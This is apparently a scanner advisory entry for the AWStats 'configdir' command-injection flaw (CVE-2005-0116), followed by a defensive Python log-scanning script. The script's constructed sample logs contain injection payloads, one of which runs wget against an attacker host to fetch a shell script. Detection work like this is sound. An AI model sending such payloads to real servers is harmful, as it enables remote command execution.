| Field | Value |
|---|---|
| VID | 21529 |
| Severity | 40 |
| Port | 80, ... |
| Protocol | TCP |
| Class | CGI |
| Detailed Description | AWStats is vulnerable to arbitrary command execution through the 'configdir' parameter of the 'awstats.pl' script. AWStats is a freely available log analyzer that collects and graphically displays statistics from web, FTP, and mail servers. Versions 5.7 through 6.2 do not properly filter user-supplied input in 'configdir'; by sending a specially crafted request whose 'configdir' value embeds shell commands delimited by pipe ('\|') characters, a remote attacker can execute arbitrary commands on the system with the privileges of the web server.<br>References:<br>http://www.ciac.org/ciac/bulletins/p-140.shtml<br>http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities<br>http://www.kb.cert.org/vuls/id/272296<br>http://secunia.com/advisories/13893/<br>Platforms Affected: AWStats versions 5.7 through 6.2, any operating system, any version |
| Recommendation | Upgrade to the latest version of AWStats (6.4 or later), available from the AWStats Download Web page at http://awstats.sourceforge.net/#DOWNLOAD<br>For Debian GNU/Linux 3.0 (woody): upgrade to the latest version of awstats (4.0-0.woody.2 or later), as listed in Debian Security Advisory DSA-682-1 at http://www.debian.org/security/2005/dsa-682<br>For other distributions: contact your vendor for upgrade or patch information. |
| Related URL | CVE-2005-0116 (CVE) |
| Related URL | 12270,12298 (SecurityFocus) |
| Related URL | 18912,19058 (ISS) |
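As an added example (not part of this entry and not AWStats' own code), the following Python script runs the check a defender would want for this finding over a few constructed Apache combined-format access-log lines: it picks out requests to awstats.pl whose percent-decoded 'configdir' value contains anything outside a plain directory path, the '|' character in particular. The log lines, client addresses and payload strings are all constructed for illustration; the whitelist in is_hostile_configdir is the same test one would apply server-side to reject such a value before it reaches a filesystem open, and the '..' rule is an extra conservative choice beyond what the entry describes.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log sample (not real traffic): a normal report
# request, two requests carrying '|' in configdir, and unrelated noise.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jan/2005:10:01:12 +0000] "GET /cgi-bin/awstats.pl?config=example.com HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Jan/2005:10:02:40 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cecho;id;echo%7C HTTP/1.1" 200 311 "-" "Mozilla/4.0"
10.0.0.7 - - [20/Jan/2005:10:03:05 +0000] "GET /cgi-bin/awstats.pl?configdir=/etc/awstats&config=example.com HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Jan/2005:10:03:51 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cwget%20http://10.0.0.9/x.sh%7C HTTP/1.1" 500 0 "-" "Mozilla/4.0"
10.0.0.3 - - [20/Jan/2005:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to recover client, time, request line and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# A legitimate configdir is a plain directory path. Shell metacharacters such
# as '|' or ';' fall outside this set; '..' is refused as an extra rule that
# goes beyond the advisory's description (an assumption of this example).
SAFE_CONFIGDIR = re.compile(r'[A-Za-z0-9_./-]*')


def is_hostile_configdir(value):
    """True if a decoded configdir value should be refused or alerted on."""
    return SAFE_CONFIGDIR.fullmatch(value) is None or '..' in value


def query_params(query):
    """Split a raw query string on '&' only and percent-decode each part.

    Deliberately not urllib.parse.parse_qs: older Python releases also split
    on ';', which would chop a payload like '|echo;id;echo|' into pieces.
    """
    params = []
    for pair in query.split('&'):
        if pair:
            key, _, val = pair.partition('=')
            params.append((unquote_plus(key), unquote_plus(val)))
    return params


def find_exploit_attempts(log_text):
    """Return awstats.pl requests whose configdir carries hostile characters."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group('target').partition('?')
        if not path.endswith('/awstats.pl'):
            continue
        for key, val in query_params(query):
            if key == 'configdir' and is_hostile_configdir(val):
                hits.append({'ip': m.group('ip'), 'time': m.group('ts'),
                             'configdir': val, 'status': int(m.group('status'))})
    return hits


if __name__ == '__main__':
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} status={hit['status']} "
              f"configdir={hit['configdir']!r}")
```

Run against the constructed sample it reports the two requests from 10.0.0.9 and nothing else; the request with a real directory in 'configdir' passes the whitelist. Matching is done on the decoded value rather than on the raw request line so that both `%7C` and a literal `|` are caught, and the HTTP status is kept because a 200 on an injected request is the case that deserves follow-up.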